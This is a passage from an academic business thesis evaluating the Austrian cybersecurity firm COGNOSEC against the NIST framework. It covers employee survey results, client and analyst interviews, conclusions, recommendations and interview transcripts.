publication nature and purpose. Respondents are more likely to provide honest answers in a
comfortable environment. This was ensured by keeping the interview language simple and
comprehensible. Towards the conclusion of the research, the input of all participants was
appreciated. Strictly following the legal and ethical guidelines has enabled the researcher to make
this study more reliable and authentic; making it even more valuable in the academic field and
beneficial to future researchers.
4. FINDINGS AND ANALYSIS
In this chapter, the researcher lays out all the primary research findings from survey and interview
exercises. Methodology and ideology behind primary data collection is already explained in
chapter 3. While both survey and interview findings are critically analyzed as they are presented,
an overall analysis is also conducted by the researcher at the end of the chapter to
help the reader understand the key findings of the research analysis. Secondary data from chapter
2 and supportive findings from other literature sources are used where necessary. The chapter will,
at the end, provide an illustrative reviewed NIST model for COGNOSEC, based on researcher’s
analytical deductions regarding the company’s service model.
4.1 SURVEY ANALYSIS
The first question of the survey was the most important as it required participants to rate the various
dimensions of their company’s cyber security services on a Likert scale. Respondents’ scores were
then added. The Likert scale is explained in chapter 3 in more detail. Exhibit 6 below gives the
graphical representation of employees’ responses to this question. The services on the graph are
arranged in descending order from left to right (service with highest score is on left most column
whereas that with lowest score is on the right most column of graph). It may be observed that
respondents voted ‘integration with other financial, logistics, communication and business
systems’ as the core strength of COGNOSEC’s cyber security service to SMEs. This was indeed
interesting to note for the researcher. It shows that COGNOSEC believes in providing a framework
which can also serve as an aid to overall business planning and management in SMEs. Similarly,
‘data and system security services’ as well as ‘risk assessment, management and mitigation’ both
earned cumulative score above 25 points. Together, these three features were rated by respondents
to be the strongest features of COGNOSEC cyber security services.
It is also interesting to note that ‘training and awareness’ received an overall low score of only
18.5 by respondents. In additional comments, some respondents noted that while COGNOSEC
provided state-of-the-art solutions and proactive detection technology, it was not keen on training
its clients beyond the basics of using its own software and tools. Continual improvement was rated
low. This is most likely because COGNOSEC generates recurrent customers by providing
incremental services. In the initial phase, one level of protection is implemented, then the second
and third. This allows COGNOSEC to generate more revenue and also helps the client gain expertise
in cyber threat management. Some respondents also noted price as a deterrent for customers.
The second survey question was straightforward and asked respondents to evaluate which service
domain COGNOSEC excelled at. Respondents were asked to choose only one option to get a fair
idea of which single area of service they considered strongest at COGNOSEC. The five options
provided were according to the five functions of the NIST framework (see chapter 4). Out of the
seven respondents, three (the largest majority) identified that ‘protection of their client’ was their
strongest feature. This protection included technological and infrastructure solutions to cope with
threats previously identified by either the SME or COGNOSEC itself. As discussed above,
COGNOSEC distinguishes its 'consultancy' services, which focus on threat identification, from its
solution services, and its true strength lies in providing the best solutions to counter any threats. Only one respondent
each identified detection of threats and recovery of data as COGNOSEC's strengths. This may be
because COGNOSEC has not had much experience in the domains of threat detection and
recovery for local clients (see exhibit 7).
The next question then explored employees’ opinion on the threats they perceived the company
currently faced. Here, respondents were given the flexibility of choosing more than one option.
Interestingly, five of the seven respondents said that ‘probability of imitation of their service
model’ by local competitors was the most important challenge. Another four also noted that
organizational culture could benefit from improvements. None of the respondents identified ‘lack
of technical expertise’ as a problem (see exhibit 8). The researcher believes this might be because
COGNOSEC already has a highly talented workforce and sound HRM mechanisms to attract and
retain talent.
Finally, the survey asked respondents to choose one or more opportunities from the list
provided that they thought COGNOSEC has in the near future (see exhibit 9). Six of the seven
respondents said the growing demand for cyber security services all over the world will mean big
business for COGNOSEC. Employees also noted that COGNOSEC's unique service model and
its innovative product were an opportunity in themselves, as they help COGNOSEC differentiate itself
from others. One respondent added in extra comments that he believed that international expansion
of COGNOSEC in future would significantly boost business prospects.
Exhibit 6: Employees' perception of COGNOSEC's cyber security services (cumulative Likert scores, arranged in descending order as on the chart)
Integration with financial/logistics/communication/business …: 29.8
Data/system security software: 28.7
Risk assessment, management and mitigation: 26.8
Protective technology: 24.9
Protection against zero-day attacks: 24.5
Threat detection prowess: 24
Price of package: 23.2
Simplicity of use and flexibility of modification: 21.5
Continual improvements: 19.6
Awareness and training: 18.5
Exhibit 7: Which task is COGNOSEC best at? (number of respondents)
Identifying threats for company (and suggesting solutions): 0
Protecting clients against threats (when clients identify their own threats): 3
Detecting threats (that clients do not know of): 1
Response to threats (technological): 2
Recovery of lost data (when client has been under cyber-attack): 1
Exhibit 8: What are core barriers and challenges faced by COGNOSEC? (number of respondents; more than one option could be selected)
Lack of technical expertise: 0
Lack of budget: 1
Government restrictions and inability to expand: 3
Confused clients (who don't know the problem or don't see it): 2
Evolving nature of cyber threats: 2
Organizational culture is weak: 4
Service price is too high which limits our market: 3
Competition is tough: 3
Others can imitate our model: 5
Exhibit 9: What are some future opportunities for COGNOSEC? (number of respondents; more than one option could be selected)
Cyber security demand in SMEs is growing locally: 6
Competent cyber security experts are limited: 2
Our model is unique and better than many: 4
We have a huge portfolio and good word-of-mouth: 3
4.2 INTERVIEW ANALYSIS
The interview methodology and participant information is also detailed in chapter 3. COGNOSEC
clients and industrial analysts were the participants of this activity for reasons explained in
chapter 3. The first question asked respondents whether they believed that COGNOSEC's
cyber security services were up to standard and satisfactory to customers or not. To this, one
satisfied customer replied:
“Yes, COGNOSEC provides foolproof security measures against conventional threats. Personally,
our company never had to deal with very complex cyber problems so far so I cannot really
comment on how well COGNOSEC can handle that. But I would definitely recommend
COGNOSEC to SME clients seeking long-lasting services for their company.”
Another retail SME representative added that the ability of COGNOSEC model to integrate with
others. According to him:
“What I like best about their service model is that it sits well with our business model and other
management tools.”
An industrial analyst on the panel however noted that the model tended to be too complex for some
users with low expertise in this domain. His comments were:
“I think their model is too complex for people who have no expertise in cyber security
management. They need to provide complementary training services or something on those lines.”
The next interview question was mostly industry oriented and asked respondents to evaluate
whether they believed that COGNOSEC’s services offered them competitive advantage in the
market or not. The industry analyst in the panel of respondents offered a detailed explanation to
this and said:
“If we look closely at the company’s performances, annual reports and client testimonials, then I
would say yes. The company has rapidly growing revenues and all its financial indicators are in
its favor. Its portfolio of clients shows that customers are generating positive word-of-mouth and
referrals. Therefore, it shouldn’t be hard to believe that COGNOSEC is set on a path towards
competitive advantage. Let me also mention that their services are considered unique and high-
end due to their state-of-the-art software. This can easily allow them to differentiate themselves in
the market.”
A prior customer of COGNOSEC noted that the brand will have to prove that its strategy is sustainable
in the long run to really impress clients.
“Only if they are able to manage their quality sustainably. Because I see other firms in Austria
that are quickly rising to take on SME clients. COGNOSEC has to be careful.”
COGNOSEC's clients were then asked to explain whether or not they would work with
COGNOSEC in future, and why. All three former COGNOSEC customers showed willingness to work with
the company in future as well. One explained that:
“Although they are pricey, their product is long-lasting and helps us in other domains as well. I
am the kind of manager who believes in one-time investment BUT quality investment. So
COGNOSEC will be my cyber security provider in future as well.”
Price was raised as a concern by another SME manager as well. He said:
“The price is surely a deterrent. I think this is an investment which cannot yield many results.
Cyber security threats keep changing. SMEs cannot afford to revamp their IT security
infrastructure every year or so. Therefore, I want to explore other options as well.”
The industry analyst responded to this question saying:
“COGNOSEC will have to clearly segment its market and know what service to provide to which
client. Cost conscious customers may want to shift to other competitors. But COGNOSEC’s service
differentiation will continue to be its strength in generating loyalists.”
Finally respondents were asked their opinion on the possible recommendations to further improve
the output performance of COGNOSEC. One SME manager noted:
“COGNOSEC should invest in post-purchase services. For instance, training sessions and
significance of threat awareness should be made in SME decision-makers because most often, like
me, they do not know about these things.”
The industry analyst noted:
“COGNOSEC needs to protect itself from competition too. They need to ensure that their business
model is not imitated. They also need a constant stream of fresh talent that can maintain
sustainable advantage by innovating the service.”
The overall responses of interviewees show that COGNOSEC’s services are rated high by
customers in general. However, price is a major factor that clients consider before entertaining
COGNOSEC as a service provider. According to Johnson (2013), in B2B brand equity, it is
imperative for business to take into account three key factors: 1) product/service perceived quality;
2) customer satisfaction; and 3) product/service uniqueness. In the case of COGNOSEC, respondents'
views seem to show that these three elements are present in the company's service.
According to IT industrial analysts too, service credibility and uniqueness is an essential driving
factor for business growth (Awasthi, 2015). Leung (2012) notes that one primary motivation for
SMEs to pursue cyber security infrastructure is the need for standardization such as ISO27001 and
the SANS Critical Controls. But even otherwise aware organizations may not know the risks they
face and how to address them (Valenzano, 2014). Therefore, good cyber security can provide
comparative advantage, product differentiation and even business opportunity (Wamba & Carter,
2014).
Interview results also show that currently COGNOSEC enjoys competitive advantage in the
Austrian market because of product differentiation. The COGNOSEC annual report mentions that
COGNOSEC provides the best services in the given cost structure and that all market competitors
are offering higher prices for the same bundle of cyber security services (Macdonald et al., 2013).
This concept is, however, debatable, as the market keeps evolving and new players continue to emerge.
The Austrian Cyber Security Strategy / ACSS (Österreichische Strategie für Cyber Sicherheit /
ÖSCS) provides further business opportunity to cyber security providers such as COGNOSEC as
it helps build awareness of cyber threats among SMEs (Harris & Patten, 2014). Moreover, the fact
that all clients showed willingness to enter new contracts with COGNOSEC in future shows that
the company is doing fairly well in local B2B brand equity.
4.3 OVERALL ANALYSIS
The researcher has laid out and elaborated both the survey and interview results in preceding
sections. This section will now conduct an overall analysis of findings keeping in mind the
literature review in chapter 2 and the findings discussed here.
The survey exercise with COGNOSEC employees highlights the strengths and weaknesses of
cyber security model of the company in light of the NIST framework. Based on the information,
it is possible for the researcher to construct an overview of the COGNOSEC security model shown
in exhibit 10. The grey scale depicts the ‘health’ of the function at COGNOSEC. Jet black shade
signifies that the condition of that particular parameter at COGNOSEC is extremely poor whereas
white means the parameter is in excellent condition. The darker the shade, the more effort the parameter
needs to improve.
Through survey results, company reports and interviewee responses it was noted that the
company's strongest points are its risk strategy, including assessment, management and mitigation,
as well as detection processes. The company excels in securing data for its clients and protecting
critical infrastructure and information. Its response planning, analysis and mitigation in response
to cyber threats are also efficient, as noted by clients who have availed its services.
It was observed that although COGNOSEC provides state-of-the-art solutions to its clients, its
systems are usually complex and clients with low skillset in this domain may not be able to take
full advantage of the system. COGNOSEC has considerable room for improvement in terms of
post-purchase services. One key post-purchase service may be the provision of training and
awareness raising workshops to its clients in the SME sector. According to Valenzano (2014),
post-purchase services can create larger market for the B2B brand, generate positive word-of-
mouth and result in higher brand loyalty. Kozik & Choras (2013) go a step further and add
that pre-purchase services such as demonstrations and free trials can also go a long way in
motivating some clients.
The internal organizational structure of COGNOSEC might also need a review. According to its
annual report, the company is governed by the Manager, Owners and Board of Directors. But
Harris & Patten (2014), in their work, note that IT programming talent is a fad in the modern
millennial generation where self-made programmers and hackers have demonstrated amazing
capabilities. Therefore, COGNOSEC can benefit competitively by seeking these highly skilled
individuals through innovative HRM strategies and talent management policies. Effective internal
communication, as noted by Hill et al. (2014), also helps benefit the organizational goals as a
whole.
Finally, while COGNOSEC already has competitive advantage in terms of its service
characteristics, it can make this advantage sustainable over a long period of time by incorporating
a standard strategy for continual improvement. This can be done by introducing programs such as
change management and knowledge management. Change management as defined by Hayes
(2014) is the process of formally managing alterations in the work place practices over time.
Knowledge management is the process of organizing, sharing, archiving and transferring data
within organizations (Kostopoulos, 2012). These processes according to Henson & Sutcliffe
(2013) can help guarantee data safety within organizations and can facilitate development of new
solutions.
Based on Porter’s generic strategies model, it is evident that COGNOSEC clearly enjoys ‘product
differentiation’ success in the Austrian market. Discussion with former clients of the company and
industry analyst showed that COGNOSEC’s services are well-reputed and respected in the market.
The company’s portfolio also shows that it has worked with many large and small corporations in
the past years, providing security. The most important aspect of its competitive advantage that
came to light through this research is that COGNOSEC provides security services that complement
other business management systems at SMEs. Therefore, instead of being a mere investment in
cyber security insurance, it becomes a tool of competitive advantage for businesses.
Mowbray (2013) has shown that cyber security systems work best in integration with knowledge
management, financial management, decision-making and database management systems. While
they can perform as stand-alone systems as well, an ideal cyber security system always
complements other systems within the organization. Johnson (2013) further shows that SMEs
usually look for multi-dimensional solutions that may be addressed by a single tool. This lowers
costs and reduces complexity (Awasthi, 2015). Hence this integrative aspect of the COGNOSEC
cyber security package is a plus point both for the company and its clients.
Moreover, Kagan & Cant (2014)’s research shows that cyber security indirectly benefits
corporations, especially SMEs. Very often, SMEs can continue to suffer undetected losses, or face
huge reputation and financial damages in the face of scams and frauds by cyber attackers (Boyer
& McBride, 2009). These attacks are a challenge to competitive advantage of companies. SMEs
which invest in cyber security can prevent information breaches and manage their assets better
than their counterparts. This results in resource management, higher capabilities, customer trust
and higher brand equity. Take, for instance, the case of e-commerce. Retailers who manage to
assure their clients that powerful protection measures are in place do better at e-commerce sales
generation, compared to those whose payment methods do not seem secure to customers.
Therefore, the researcher has discovered that COGNOSEC services are valued in the market
because they provide competitive advantage to the client in more than one way. As far as the
company is concerned, its own competitive advantage lies in its ‘product differentiation’ strategy.
Lastly, pricing was identified as somewhat of a deterrent in COGNOSEC's strategy. The researcher
believes that the pricing model of COGNOSEC is adequate considering the quality and uniqueness
of its services. However, COGNOSEC can benefit from market segmentation and customized
strategy for each segment. Market segmentation allows an organization to assess its target
market and plan penetration strategies accordingly (Kagan & Cant, 2014). For instance, a
segmentation based on nature of SMEs can show that e-commerce SMEs may be more willing to
invest in high-end services. Similarly, segmentation by cyber threats can allow COGNOSEC
management to see which SMEs are most willing to invest in which mode of service. Finally,
segmentation by SMEs’ financial revenues can reveal which clients are willing to invest most
readily in high-end services and which ones require only basic level cyber security.
In light of these findings therefore, the researcher has deduced that COGNOSEC cyber security
services are largely in accordance with the general guidelines laid out by the NIST framework and
therefore the service model is at par with international best practices in cyber security. Slight
improvements in the domains of post-purchase services and sustainable improvements can benefit
COGNOSEC. The research also noted that the company has a 'product differentiation' advantage in
the market and is also a means of competitive advantage for its SME clients. The ability of its
cyber security model to integrate with other management models is the strongest plus point favored
by clients.
Exhibit 10: COGNOSEC service model reviewed in light of NIST Framework
5. CONCLUSIONS AND RECOMMENDATIONS
In this chapter the researcher has highlighted the key findings of the research study. Three
recommendations are suggested for COGNOSEC to benefit from this discussion. The theoretical
and managerial implications of the research are outlined, and the scope for future research is explained here.
5.1 CONCLUSION
This research has investigated in detail, the core features of the cyber security services provided
by the Austrian firm COGNOSEC based on the generic standard model ‘NIST framework’. The
researcher has found that the COGNOSEC service model is comprehensive and sound. It offers
risk assessment, management and mitigation for cyber risks as well as detection of potential threats
that could harm data/information and infrastructure for its clients. The most notable feature
of COGNOSEC's service model is that it integrates well with other business management models
including logistics, finances, management and risk mitigation systems. Therefore, the firm’s
services were found to be a valuable competitive advantage tool for SME clients looking for more
than just cyber security insurance.
COGNOSEC itself is able to establish itself as a strong player in the Austrian cyber security market
due to its service differentiation. It achieves this not only by providing state-of-the-art cyber
security features to clients and enabling them to detect and address threats, but also by providing
additional services in planning and management. Comments from SME clients of the firm showed
that users are satisfied and would want to work with the company in future. This shows that
COGNOSEC enjoys strong brand equity and loyalty in its current market owing to high perceived
product quality and customer satisfaction.
It was noted in the research that COGNOSEC can benefit by providing both pre and post purchase
services to clients. Considering the complex nature of cyber security and the lack of skills to address
this domain, especially in SMEs, COGNOSEC can build better brand equity by creating awareness
regarding cyber threats and training clients in the optimum usage of their ITC security model.
COGNOSEC employees considered that the possible imitation of their service differentiation
model by competitors is a risk to business profitability. Moreover, room for improvement was
noted in the existing organizational culture, especially in the HRM domain.
5.2 RECOMMENDATIONS
While COGNOSEC already boasts a strong brand equity in the market, three recommendations
are being forwarded by the researcher to further strengthen its position and win greater competitive
advantage.
Firstly and most importantly, the firm must work on developing innovative solutions for post
purchase services. The cyber security industry is a technical one and as noted in this study, skills
in this domain are limited at most SMEs. This is also one major reason that SMEs fail to protect
themselves against cyber risks. The research also observed that the COGNOSEC service model,
while comprehensive and state-of-the-art, was technical and rather complex for many clients.
Therefore, providing user training, introducing customization and continual improvements and
creating awareness regarding threats can help form long-term bonds with customers. It can also
help COGNOSEC win future contracts and can improve word-of-mouth publicity. Indirectly too,
the greater awareness of cyber threats yields greater market demand which is beneficial for
COGNOSEC in the longer run.
Next, there is a need to review some internal organizational management aspects. As discussed in
chapter 2, the NIST framework implementation begins at the grass-roots level and involves the
highest management and the operational level. At COGNOSEC, it was noted that the company
follows a largely pyramidal management hierarchy which limits flexibility in decision-making.
Their hierarchy should be made flatter through stakeholder management and consultation.
Moreover, the HRM department can benefit from creating innovative tests to recruit the best and
brightest talent in the market. For instance, in 2012, the internet was taken by a storm when some
anonymous group/individual by the name of ‘Cicada 3301’ posted a creative cyber puzzle to
evaluate the best programmers in the world. Tens of thousands of people worked on the puzzle
and it generated huge buzz. Later, NSA, CIA and many other agencies copied this innovative
recruitment strategy and devised tests to pick the best available talent. This strategy and other
similar out-of-the-box HRM talent hunts can significantly improve COGNOSEC's differentiation
strategy as its strength lies in its workforce.
5.3 THEORETICAL AND MANAGERIAL IMPLICATIONS
The research has added to the available body of literature on the topic by addressing the literature
gaps mentioned in section 2.5. Evaluation of a cyber security service provider in the theoretical
framework of NIST has been conducted for the first time, and the research has shown that this type
of analysis helps discover core strengths and weaknesses of the services. More importantly, the
research has shown that SMEs gain multidimensional benefits from investing in cyber security when
the security model integrates with other management features at firm level.
From a managerial perspective, the research is a case study of a successful cyber security service
provider. It has shown that benchmarking against theoretical frameworks helps reveal inherent
weaknesses. The researcher has also suggested certain recommendations to further strengthen the
company's market position.
5.4 FUTURE RESEARCH SCOPE
While this research has yielded interesting conclusions, future studies can take the subject forward
and add to the literature on the topic. An empirical investigation of the relationship between cyber
security and firm profitability would be worth conducting. The emerging forms of cyber threats and
the response of service providers in light of HRM techniques are another interesting research area,
because many cyber security firms are reinventing HRM to hire the very best, as the workforce is the
greatest competitive advantage for cyber security firms.
APPENDIX: INTERVIEW QUESTIONS
1. Do you believe that COGNOSEC's cyber security services are satisfactory?
2. Does COGNOSEC’s cyber security system provide competitive advantage to the
company?
___________________________________________________________________________
3. Will you work with COGNOSEC again in future? Please elaborate why or why not.
________________________________________________________________________
4. How can COGNOSEC further improve its cyber security services?
________________________________________________________________________
SURVEY CONFIRMATION LETTER
TRANSCRIPT 1
1. When it comes to security, small and medium-sized businesses have to be cautious. They
have to make sure their online security is airtight and that their systems do not get breached.
To this end, we have been working with COGNOSEC for quite some time now. So far their
security systems have allowed us to work without any major security issues. Though since
we have never had any major security issues, I do not know how good COGNOSEC is.
However, they provide great long-term services and I would recommend them to other
small and medium-sized businesses who seek such services.
2. Before we started working with COGNOSEC, we investigated them thoroughly. Their
services were well appreciated by the companies that used them. We wanted a cyber
security company that would make our business stronger, and we went with COGNOSEC.
Since then our company has had positive reports and customer feedback. It has also allowed
our company to have greater profits. COGNOSEC keeps an eye on market trends and
then provides services that are unique and of better quality because of their cutting-edge
software system. Because of this, COGNOSEC has carved a name for themselves in the
world of cyber security.
3. Going with COGNOSEC provided our company with many advantages. The services
provided by COGNOSEC are unique and helpful, but they are too expensive for smaller
businesses. Also, COGNOSEC cyber security systems must be upgraded and renewed
every year, which increases the cost more than is feasible. They have to be renewed and the
systems have to be upgraded because cyber protection changes with the development of
new threats. For a business like ours, which does not face that many threats, it is quite
impractical to keep using COGNOSEC. I would rather look for options besides
COGNOSEC, as it is too expensive.
4. In terms of cyber security, COGNOSEC is going very strong. Their state-of-the-art
software allows them to protect their clients from cyber threats very efficiently. Their
services are beneficial for the customers, and that makes COGNOSEC very popular in the
market. However, one thing I find lacking with COGNOSEC is that they do not raise
awareness about cyber threats. For small businessmen like myself, cyber security does not
hold much significance because we do not understand it. Keeping that in mind,
COGNOSEC should hold awareness seminars and sessions providing training for people
like us to increase our knowledge of such threats.
TRANSCRIPT 2
1. Certain security services are provided by COGNOSEC, and I personally believe the security
services provided by COGNOSEC are satisfactory. They are a good measure against the outside
threats faced by COGNOSEC. To be honest, we did not have situations to face where our
company had to deal with severe threats or problems related to the cyber world. So, as a result,
the COGNOSEC security systems have never been tested, so we are still unsure how well
COGNOSEC can deal with such situations. But I believe that COGNOSEC is good for small
businesses, so I will personally recommend them to go for COGNOSEC.
2. If we have a closer look at COGNOSEC's performance in the financial reports, annual
reports and the clients' suggestions and opinions, the answer is in the affirmative. The overall revenues
of the company have been constantly increasing, and the financial performance is the
proof. Moreover, the client portfolio depicts that the customers are satisfied with the company's
overall performance and they have spread the goodwill of the company to their friends and
relatives. And thus we should believe that COGNOSEC will have a competitive gain very soon.
The services have been phenomenal and the market share has been increasing.
3. The price needs to be considered, as it is an important factor for COGNOSEC. Personally,
I guess that we have been investing with no productivity in the end. The threats are not new
in the market and they have been constantly taking place in new shapes and places, and this is the
reason the small businesses are unable to afford the cyber anti-securities to improve their IT
infrastructure. So, I personally believe that these small companies should be considered as well,
and such systems and alternatives should be developed which actually do benefit them in the long
term.
4. COGNOSEC has made a lot of investments in different assets, and they need to invest in
post-purchase service behaviour. For example, there should be awareness campaigns and training
modules held for the employees of small businesses so that their knowledge is increased,
because, after all, employees and management do not have sufficient knowledge of cyber
security, its threats, and the ways these threats can be demolished. Small businesses have
limited and low budgets, so they are unable to hold training sessions and the meeting grounds for them to
take place; thus their employees seldom know about cyber threats and the IT world.
TRANSCRIPT 3
1. In my personal opinion, COGNOSEC is one of the few companies in Europe which has
PCI Security Standards recognition and is also qualified in security management. Their main
strategy is to develop and deliver a customized solution for each specific project. Also, with
the help of its penetration testing, the company is providing an independent and reliable
view of the problems related to cyber security. The company also works in the interest of
the administration in companies, and gives them free advice with respect to their
general needs of cyber security by providing them the administrative services or
procedures that match the needs of their different cyber applications. So in my opinion
COGNOSEC services are not just satisfactory but also self-sufficient.
2. Due to the expansion of its services in various countries, COGNOSEC has managed to
sustain its position in the industry. By looking into the details of the company's information
obtained from published statistics, it is observed that COGNOSEC's objective for income
development is 15 percent every year, and with the help of its strategic management the
goal of the 15% margin is maintained. It was only possible because of the diversification
of the company's services. The arrangement for customers in which it provides separate
services to its consumers has led to positive word of mouth and referrals from the
clients. Their remarkable administrative services are keeping them separate from their
competitors in the business sector. I think the company's recent revenues also suggest that
due to its distinctive cyber security services the company has not just gained a
competitive advantage but has also quickly developed its income.
3. I think the cost of dealing with such cyber security crimes is quite high and, due to its ever-changing
nature, the investment in such a service is necessary but would be cost obstructive.
Although COGNOSEC provides customised services to its customers, its price is acting
as an obstacle that is deterring us from buying this service, because being a small
organization it is not cost effective for us to invest in security systems and reinvent them
over and over again. That is why I would want to opt for the other opportunities present in the
market as well.
4. In my opinion, COGNOSEC should educate their customers to adopt certain methodologies
that would help their companies in protecting themselves from the alarming situations that
are created through cybercrimes. Also, in order to minimize disruption, they should
develop contingency plans. A contingency plan or a general alternate course of action
should focus on three segments: incident response, recovery, and business continuity.
Such steps would not just help companies like us in saving our data but will also keep
us functioning through a crisis.
TRANSCRIPT 4
1. The answer is yes; there is a high level of security provided by COGNOSEC which deals
with conventional threats. We never had to handle any complicated cyber problems, so I
can't say how the company might handle it. Regardless, I do give my recommendation to
use COGNOSEC, particularly for SME clients who want stable services with a company
they can maintain a long-term relationship with.
2. By looking at the performance of the organization as well as its testimonials from clients
and annual reports, my answer is yes. There is significant growth of revenues in the
company, where all of the financial indicators are in the favor of the company. The client
portfolio depicts that there is positive word-of-mouth as well as strong referrals.
Thus, it isn't a difficult thing to believe that COGNOSEC is on its way to acquiring
the comparative edge. I'd like to also say how the services of the company are very unique
as well as being of the best quality considering their high-quality software. As a result, they
can be differentiated in the market quite easily.
3. Unfortunately, price does act as a deterrent. I think that this investment doesn't have
many returns to get results. The threats in cyber security keep on adjusting, as SMEs can't
really afford to keep changing their IT infrastructure on an annual basis. Thus, I wish to
explore different options in addition to this.